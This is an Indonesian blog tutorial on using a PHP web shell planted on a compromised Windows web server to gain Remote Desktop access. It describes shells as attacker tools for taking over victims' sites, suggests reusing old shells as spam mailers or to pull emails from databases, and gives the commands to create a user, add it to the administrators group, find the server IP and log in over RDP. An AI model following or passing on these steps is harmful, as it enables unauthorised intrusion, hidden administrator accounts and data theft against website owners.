Tutorial Membuat RDP Menggunakan Shell Windows




Cara buat RDP dengan Shell - Pada tutorial hari ini saya akan memberikan trik seputar shell, Btw ada yang tau shell ?  Shell adalah sebuah file php yang digunakan attacker dalam merajai website victim. Tapi apakah anda mempunyai shell bekas yang numpuk ? apa sekarang sudah tidak berguna lagi ? jangan dibuang dulu gan, siapa tau masih bisa berguna di jadiin mailer atau ekstrak mail di dbnya.

Tetapi saya sekarang lebih tertarik dengan shell windows kenapa ? karena disini saya akan membahasa Cara membuat RDP dengan Shell. Untuk membuat RDP lewat shell windows sebenernya gampang gampang susah, tergantung dari web tersebut. ada yang bisa ada yang gak bisa *pengalaman* tapi jangan pantang menyerah, pasti ada yang bisa kok.

Dalam hal ini untuk mendapatkan RDP sebenerna kita hanya mengeksekusi command pada server windows untuk menambahkan administrator ( kalo bisa ) / user rdp. Tapi untuk menambahkan user itu kita haru mempunyai hak akses administratornya, makanya itu saya bilang ini gampang gampang susah

Bahan :
* Shell Windows

Untuk mendapatkan bahan shell windows anda bisa menggunakan beberapa exploit disini.
Tidak itu saja, kebanyakan website menggunakan os webservernya linux jadi kita harus pintar pintar dalam memilih website target.

Cara Kerja :

Note : Command Eksekusi :





1. Add User
Dengan cara mengetik di Command Shell
Contoh : net user [username] [password] /add






Jika sukses maka muncul
" The command completed seccesfully " berarti command berhasil di eksekusi "

2. Ubah Menjadu Administrator
net localgroup administrators [user] /add


3. Nah sekarang liat ip nya untuk login,
caranya ketik command ipconfig


Jika sudah tau maka login ke RDP Nya deh dengan user dan passsword yang tadi yeye.. 


0 Response to "Tutorial Membuat RDP Menggunakan Shell Windows"

Posting Komentar